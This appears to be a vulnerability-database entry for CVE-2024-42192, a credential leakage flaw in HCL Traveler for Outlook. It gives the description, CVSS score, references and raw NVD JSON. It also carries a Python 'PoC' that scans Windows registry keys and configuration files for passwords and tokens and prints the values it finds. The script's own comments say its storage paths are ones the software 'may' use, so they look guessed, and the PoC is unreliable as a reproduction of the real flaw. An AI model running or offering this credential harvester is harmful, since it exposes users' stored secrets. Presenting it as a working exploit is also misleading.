CVE-2024-42192

Description

HCL Traveler for Microsoft Outlook (HTMO) is susceptible to a credential leakage which could allow an attacker to access other computers or applications.

CVSS Details

CVSS Score

5.5

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:hcltech:traveler_for_microsoft_outlook:*:*:*:*:*:*:*:* - VULNERABLE

HCL Traveler for Microsoft Outlook (HTMO) 所有未修复的受影响版本

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

# CVE-2024-42192 - HCL Traveler for Microsoft Outlook Credential Leakage PoC
# This PoC demonstrates how an attacker with local access could potentially
# extract credentials stored by the HTMO Outlook plugin.
# Note: This is for educational and authorized testing purposes only.

import os
import winreg
import json

# Common locations where HTMO may store credentials on Windows
REGISTRY_PATHS = [
    r"SOFTWARE\HCL\Traveler",
    r"SOFTWARE\HCL\Notes",
    r"SOFTWARE\IBM\Notes",
    r"SOFTWARE\Microsoft\Office\Outlook\Addins\HCL Traveler",
]

CONFIG_FILE_PATHS = [
    os.path.expandvars(r"%APPDATA%\HCL\Traveler\config.xml"),
    os.path.expandvars(r"%LOCALAPPDATA%\HCL\Traveler\credentials.dat"),
    os.path.expandvars(r"%APPDATA%\Microsoft\Outlook\HTMO_settings.ini"),
]

def check_registry_credentials():
    """Scan Windows registry for stored HTMO credentials."""
    found_creds = []
    for path in REGISTRY_PATHS:
        try:
            # Attempt to read from HKCU first (current user)
            key = winreg.OpenKey(winreg.HKEY_CURRENT_USER, path, 0, winreg.KEY_READ)
            i = 0
            while True:
                try:
                    name, value, _ = winreg.EnumValue(key, i)
                    if any(kw in name.lower() for kw in ['pass', 'token', 'cred', 'auth', 'key']):
                        found_creds.append({"registry_path": path, "name": name, "value": value})
                    i += 1
                except OSError:
                    break
            winreg.CloseKey(key)
        except (FileNotFoundError, PermissionError):
            continue
    return found_creds

def check_file_credentials():
    """Scan filesystem for HTMO credential files."""
    found_creds = []
    for filepath in CONFIG_FILE_PATHS:
        expanded = os.path.expandvars(filepath)
        if os.path.exists(expanded):
            try:
                with open(expanded, 'r', errors='ignore') as f:
                    content = f.read()
                    if any(kw in content.lower() for kw in ['password', 'token', 'credential']):
                        found_creds.append({"file": expanded, "preview": content[:500]})
            except PermissionError:
                found_creds.append({"file": expanded, "status": "access_denied"})
    return found_creds

def main():
    print("[*] CVE-2024-42192 - HTMO Credential Leakage Scanner")
    print("[*] Scanning for potentially leaked credentials...\n")

    reg_creds = check_registry_credentials()
    file_creds = check_file_credentials()

    if reg_creds:
        print(f"[!] Found {len(reg_creds)} potential credentials in registry:")
        for cred in reg_creds:
            print(f"    Path: {cred['registry_path']}\\\\{cred['name']}")
            print(f"    Value: {cred['value'][:50]}..." if len(str(cred['value'])) > 50 else f"    Value: {cred['value']}")

    if file_creds:
        print(f"[!] Found {len(file_creds)} potential credential files:")
        for cred in file_creds:
            print(f"    File: {cred['file']}")

    if not reg_creds and not file_creds:
        print("[+] No exposed credentials found (system may be patched).")

if __name__ == "__main__":
    main()

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2024-42192
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2024-42192
[3] CVE Details https://www.cvedetails.com/cve/CVE-2024-42192/
[4] VulDB https://vuldb.com/cve/CVE-2024-42192
[5] https://support.hcl-software.com/csm?id=kb_article&sysparm_article=KB0124066

Raw JSON Data

JSON

{"cve": {"id": "CVE-2024-42192", "sourceIdentifier": "[email protected]", "published": "2025-10-16T21:15:34.687", "lastModified": "2025-10-29T19:25:40.900", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "HCL Traveler for Microsoft Outlook (HTMO) is susceptible to a credential leakage which could allow an attacker to access other computers or applications."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-522"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:hcltech:traveler_for_microsoft_outlook:*:*:*:*:*:*:*:*", "versionEndExcluding": "3.0.14", "matchCriteriaId": "468513C9-EB41-4780-A31D-A5F5F10FF25D"}]}]}], "references": [{"url": "https://support.hcl-software.com/csm?id=kb_article&sysparm_article=KB0124066", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}